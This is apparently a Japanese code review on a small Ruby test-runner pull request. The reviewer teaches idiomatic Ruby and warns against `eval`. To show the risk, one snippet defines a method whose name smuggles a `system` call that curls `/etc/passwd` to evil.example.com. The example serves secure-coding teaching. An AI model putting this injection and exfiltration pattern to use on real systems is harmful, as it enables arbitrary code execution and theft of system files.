multi test
speee/testeee pull request #8
Opened 2019-11-08 03:05 UTC by teppei-komata

久々ですが、よろしくお願いします。

2019-11-12 04:57 UTC, kou requested changes

2019-11-12 04:57 UTC, kou commented on testeee.rb
> +    class_methods = self.class.instance_methods(false)
`instance_methods`はインスタンスメソッドを返すので変数名は`instance_methods`の方がよいと思います！

2019-11-12 04:57 UTC, kou commented on testeee.rb
> +    for i in class_methods do
Rubyではくりかえすときは`each`を使います！`for`でも動くのですが、`each`を使うのがRuby流です！

```ruby
class_methods.each do |method|
  eval method.to_s
end

2019-11-12 04:57 UTC, kou commented on testeee.rb
> +      eval i.to_s
また`eval`を使ってしまいましたね！
`eval`は最後の手段です！

Rubyには`__send__` という指定した名前のメソッドを呼び出すメソッドがあります。
https://rurema.clear-code.com/2.6.0/method/Object/i/__send__.html

これを使うとこう書けます。

```ruby
__send__(i)
```

`eval`でも指定した名前のメソッドを呼び出せますが、可能なら特定用途向けの機能を使うほうがよいです。`eval`だと任意のコードを実行できるので、次のようなコードを書かれたら`/etc/passwd`の内容を盗まれます。（`define_method`は指定した名前のメソッドを定義するメソッドです。）

```ruby
class Evil < TestCase
  define_method("system('curl --data /etc/passwd http://evil.example.com/')") do
  end
end
```

2019-12-03 09:07 UTC, teppei-komata commented
修正加えました！
evalってやっぱり危ないんですね。

2019-12-04 02:03 UTC, merged

2019-12-04 02:03 UTC, kou commented
マージしました！